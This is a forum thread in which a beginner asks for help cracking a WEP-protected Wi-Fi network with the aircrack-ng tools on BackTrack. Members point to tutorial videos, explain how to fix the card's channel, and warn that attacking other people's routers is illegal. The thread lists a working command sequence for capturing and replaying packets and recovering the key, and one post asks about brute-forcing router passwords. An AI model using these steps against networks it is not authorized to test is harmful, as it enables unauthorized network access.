Jump to content

Help Whit Wep Attack


Rodrigo Graça

Recommended Posts

LOOOL

i use man sometimes.

What????? You seriously need to learn. Ok, there is a good place for you to start learning about WEP cracking and I would really encourage to go through each of the videos and pay attention. The website is called securitytube.net and there are plenty of videos on cracking wep and if you are serious about this stuff, just head over there and watch the videos.

That's the only way you are going to learn, plus there is a guy called Vikiv and he put together a series of tutorial videos on WEP cracking from ground up. Explaining what each command is doing and lots more.

So please watch those videos, they will only do good for you.

Link to comment
Share on other sites

Hi guys,

SO i burn one CD whith backtrack and i am trying in another computer, so i type

1º window

airmon-ng start wlan0 (create mon0)

airodump-ng --band bg mon0 -w bt -c 11 --bssid @MAC_TO_CRACK

2º window

aireplay-ng -1 0 -a @MAC_TO_CRACK -h @MY_MAC mon0

3º window

aireplay-ng -3 -b @MAC_TO_CRACK -h @MY_MAC mon0

4º window

sudo aireplay-ng -1 6000 -o 100 -q 10 -e w_lic -a @MAC_TO_CRACK -h @MY_MAC mon3

5º window

aircrack-ng *.cap

so, now i have some questions.

why in my pc i get that error of -1?

Link to comment
Share on other sites

Hi guys.

4 seconds to crack, about 9~10 minutos to get ~28000IVs, :P

how easy was that? :D , but i cant do this on my PC :(

just another question, there are any way to bruteforce or other method to know the router passwords? (i have a strong password on my router :D )

thank you to all people that help me!

Edited by Rodrigo Graça
Link to comment
Share on other sites

What i need if it was "wpa" ? only more packets? or another things to?

wpa != wep. Completely different attack vector, and IVS aren't used for WPA like with WEP. Do your homework. Your task is to read up on the protocols. Check google, wikipedia, and the aircrack site. By the way, if you are doing this to OTHER peoples routers, you are breaking the law. You can set up your own router to test against, but logging into someone elses router is illegal in nearly every part of the world, and in some cases can have you sent to jail. What you do is your own business though. We don't care if you get arrested, it will be your own fault, but use some common sense and don't post about it here, whatever you do.

Edited by digip
Link to comment
Share on other sites

wpa != wep. Completely different attack vector, and IVS aren't used for WPA like with WEP. Do your homework. Your task is to read up on the protocols. Check google, wikipedia, and the aircrack site. By the way, if you are doing this to OTHER peoples routers, you are breaking the law. You can set up your own router to test against, but logging into someone elses router is illegal in nearly every part of the world, and in some cases can have you sent to jail. What you do is your own business though. We don't care if you get arrested, it will be your own fault, but use some common sense and don't post about it here, whatever you do.

i have autorization and the owner is my uncle :D

i know that i should do on my own internet,

i already wear about wpa and handshaks i have to study more :D

Link to comment
Share on other sites

i have autorization and the owner is my uncle :D

i know that i should do on my own internet,

i already wear about wpa and handshaks i have to study more :D

Hey bro, don't think we are not trying to help you here. We are a very supportive community and always welcome new members but as a member its your responsibility to learn and research on your own, we can't always give you the answer for everything, though we would like very much to but if we did you wouldn't be learning any thing.

Please just do what I tell you, and you will see how easy it will be for you. Here is the link for those videos, http://www.securitytube.net/groups?operation=view&groupId=9 just go through each one of the them carefully watching and paying attention to what he is saying.

To be honest, I learned quite a lot just by watching videos and researching on my own.

Link to comment
Share on other sites

Hey bro, don't think we are not trying to help you here. We are a very supportive community and always welcome new members but as a member its your responsibility to learn and research on your own, we can't always give you the answer for everything, though we would like very much to but if we did you wouldn't be learning any thing.

Please just do what I tell you, and you will see how easy it will be for you. Here is the link for those videos, http://www.securitytube.net/groups?operation=view&groupId=9 just go through each one of the them carefully watching and paying attention to what he is saying.

To be honest, I learned quite a lot just by watching videos and researching on my own.

i was watching the second video and i think that i found why my PC say "-1"

if i type "iwconfig" it say "Frequency:2.412 GHz" that is channel 1 and the wireless that i try to crack it was on channel 11

am i right?

Link to comment
Share on other sites

i was watching the second video and i think that i found why my PC say "-1"

if i type "iwconfig" it say "Frequency:2.412 GHz" that is channel 1 and the wireless that i try to crack it was on channel 11

am i right?

You are on the right track, just keep on practising and watching those videos.

Link to comment
Share on other sites

Ugg, people need to learn things...

(This falls under my 2nd variable of postings)

There are plenty of articles out there that explain how to do a WEP or WPA attack. If you dig deeper you can find all the answers. The reason (assuming) people know a lot on these forums is either from trial and error, or LOTS of reading on the subject at hand.

Link to comment
Share on other sites

I found that when locking into a channel I had to manually set the channel using iwconfig. For some reason airmon-ng will not set the channel. So if you're trying to get on channel 11, do ifconfig wlan0 down, ifconfig wlan0 IP up, iwconfig wlan0 channel 11, then airmon-ng wlan0 start 11 and it should lock into channel 11. Make sure when using airodump and and aireplay you always specify a channel or else it will bounce. In my case, if I want to change channels past here I need to reboot.

Link to comment
Share on other sites

  • 3 weeks later...

Stop the interface using ifconfig. Then use iwconfig to manually set the channel while its down. Once the channel is set, start airmon-ng on the set channel (airmon-ng start wlan0 6) then it should lock to that channel. Make sure every command you use, be it airodump, airmon, aireplay, etc that you specify the channel or it wont work.

Link to comment
Share on other sites

My usb wireless card is:

zd1211rw

Zydas 1211

Hey bro, can I recommend you to buy a wireless card from Alfa Networks, you won't have much problems.

Or better yet, go to the Hak5 shop and buy one from there.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...